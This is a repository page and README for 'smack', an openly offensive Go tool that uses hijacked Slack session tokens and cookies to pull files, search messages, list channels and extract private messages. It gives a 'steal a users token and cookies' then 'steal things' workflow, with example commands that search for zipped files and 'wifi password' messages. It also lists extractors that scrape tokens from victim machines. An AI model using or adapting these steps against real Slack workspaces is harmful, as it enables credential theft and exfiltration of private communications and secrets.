Slack web UI exfiltration and persistence project
bf41841e — terrorbyte 3 years ago
Added some ergonomics fixes
605a9f7e — cblack 3 years ago
Updated readme with emoji info
e14eb516 — cblack 3 years ago
Added emoji command


browse  log 



You can also use your local clone with git send-email.


WARNING: Experimental

A tool to use the non-public Slack user interaction API to do evil. Current / planned capabilities are as follows:

  • Download all files accessible by the user using built-in search filters or mime-type extraction
  • Search for messages using search queries and download them all
  • Get a list of channels on a server
  • Retrieve user information and rights information
  • Download all history from a channel (PARTIAL)
  • Extract a users private messages

Some important sub-features planned:

  • No external modules, stdlib the whole way
  • Portable for use on windows
  • UNIX socket API for automation


git clone git.sr.ht/~poptart/smack 
cd "${GOPATH}/src/git.sr.ht/~poptart/smack/cmd/smack"
go build smack.go


go get git.sr.ht/~poptart/smack


usage: ./smack command [-vh] [-a user_agent] [-t token]
[-x x_cookie] [-u subdomain] [-c json_config] [command specific flags]
Globally used flags:
   -h: Print help and exit
   -v: Verbose
   -a user_agent: User-Agent string defaults to
                 ("Mozilla/5.0 (Windows NT 10.0; Win64; x64)
                 AppleWebKit/537.36 (KHTML, like Gecko)
                 Chrome/73.0.3683.103 Safari/537.36")
   -t token: Slack token to use for interactions, this is from
             localStorage. Often in the format of "xoxp-*"
   -x x_cookie: User authentication cookie from cookie storage
   -u subdomain: The subdomain for authentication i.e.: "metasploit"
                 will refer to"metasploit.slack.com"
   -c json_config: Read configuration from json, an example can be seen
                   in the source "examples/config.json". Flags should
                   override settings in configuation.
Command specific flags:
   emoji: Retrieves information about emojis
      -o: output file
      -s: per user stats
   files: Retrieves all files on a Slack server
      -n: Do not download the documents only retrieve their information
      -q query: query is used for Slack search. Currently all built in
                Slack filters for text are supported, and common
                type:filters are updated in the api.go file. Useful
                ones are 'type:all', 'type:zip', 'type:pdf'.
      -f filter: Files that content-type match filter will be selected.
                 This is most useful with '-q type:all' to filter for
                 files that Slack does not directly support for
                 filtering. Example: -f "application/pdf"
      -o output: Where to output downloaded files too, this is expected
                 to be a directory
   messages: Retrieves messages from a Slack server
      -q query: query is used for Slack search. Currently all built in
                Slack filters for text are supported
      -p: retrieve messages "to" and "from" the user, aka private
      -o outfile: write the messages to 'outfile'
      -i convid: retrieve messages from a conversation id (from channel
                 or conversation). Add -l option to limit the returned
      -l limit: only return "limit" number of responses. Must be a
   channels: List all channels or channel information
      -q query: query for a list of channels matching this string
      -o outfile: write channels to file
      -p: search for only private channels
      -i convid: retrive information about a specific channel by id
   check: List information and check configuration
      -o outfile: write channels to file
      -q: do not output anything except errors, useful for quick checks


  • files - Download all matching files on a query and filter string
  • messages - Download all the messages matching a query
  • channels - List all channels on a server
  • check - Test a configuration and get client information
  • emoji - Get information and lists of emoji
  1. Steal a users token and cookies
  2. Generate a configuration file using examples/config.json as a template (NOTE: some API's might need different arguments. Generally URL, Token, and B cookie are needed)
  3. Run the check command
  4. Steal things:
./smack check -c examples/fakeserver.json
./smack files -c examples/fakeserver.json -q "type:zip" -o /tmp/
./smack files -c examples/fakeserver.json -q "type:zip password" -o /tmp/
./smack files -c examples/fakeserver.json -q "type:all" -f "text/plain" -o /tmp/
./smack messages -c examples/fakeserver.json -q "wifi password"
./smack messages -c examples/fakeserver.json -p
./smack channels -c examples/fakeserver.json
./smack channels -c examples/fakeserver.json -p -q "devops"


The smack project also attempts to maintain a way to extract the Slack tokens from victim systems. It additionally attempts to have functionality for many types of systems and many different methods for extractions. The following list of extractors is either in the works or exists:

  • Shell script - cmd/extractors/linux/extract.sh - Runs a bunch of strings on leveldb to extract tokens
  • C# executable and dll - cmd/extractors/win/cs/ - (PLANNED)
  • Go - cmd/extractors/win/go/ - (PLANNED)